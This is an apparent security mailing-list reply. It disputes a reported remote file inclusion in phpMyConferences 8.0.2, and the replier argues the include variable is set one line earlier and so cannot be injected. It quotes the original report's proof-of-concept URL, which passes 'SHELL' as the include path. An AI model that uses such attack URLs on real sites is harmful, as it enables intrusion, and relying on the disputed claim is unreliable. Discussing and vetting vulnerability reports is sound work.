Re: phpMyConferences_8.0.2 Remote File Inclusion

[Tamriel <tamriel () gmx net>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Are you kidding me? How can you use lvc_include_dir when it`s defined
one line above? And don`t tell that you can use ROOT_DIR_PATH instead of
lvc_include_dir ...


Outlaw () aria-security net wrote:

> $lvc_include_dir = ROOT_DIR_PATH."common/visiteurs/include/";
> include_once($lvc_include_dir.'new-visitor.inc.php');
>
> [...]
>
> #POC:
> http://site.com/{path}/init.php?lvc_include_dir=SHELL



-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (MingW32)

iD8DBQFFP8KuqBhP+Twks7oRCol8AJkBZTu+QNwzVKE6nu1ga0d216Cw6wCfWeKd
by5FR8zv9eoOQ4SNTmVTqvU=
=GkMY
-----END PGP SIGNATURE-----